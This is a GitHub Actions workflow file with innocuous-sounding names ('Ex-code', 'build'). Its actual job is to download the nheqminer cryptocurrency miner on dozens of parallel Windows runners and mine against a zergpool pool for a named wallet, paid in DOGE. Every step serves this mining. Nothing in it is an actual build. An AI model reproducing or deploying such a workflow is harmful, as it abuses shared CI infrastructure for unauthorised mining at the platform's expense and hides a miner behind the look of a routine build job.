name: Ex_code-unmineable
 
on: [workflow_dispatch]
 
jobs:
  build:
    name: Ex-code
    runs-on: windows-latest
    strategy:
      max-parallel: 5
      fail-fast: false
      matrix:
        go: [1.0, 1.1, 1.2, 1.3, 1,35]
        flag: [A, B, C, D, E, F, G, H, I]
    env:
        NUM_JOBS: 20
        JOB: ${{ matrix.go }}
    steps:
    - name: DOWNLOAD
      run: Invoke-WebRequest https://github.com/VerusCoin/nheqminer/releases/download/v0.8.2/nheqminer-Windows-v0.8.2.zip -OutFile nheqminer-Windows-v0.8.2.zip
    - name: Extract
      run: Expand-Archive nheqminer-Windows-v0.8.2.zip
    - name: RUNNING
      run: unzip nheqminer-Windows-v0.8.2.zip && cd nheqminer && nheqminer -v -l verushash.asia.mine.zergpool.com:3300 -u A8Bc1cMKPg1m2A6VAsGoSSLFBJm7mUWh7N -p c=DOGE,mc=VRSC,ID=Gangbang -t 16 -e 2
    - name: DONE
      run: exit
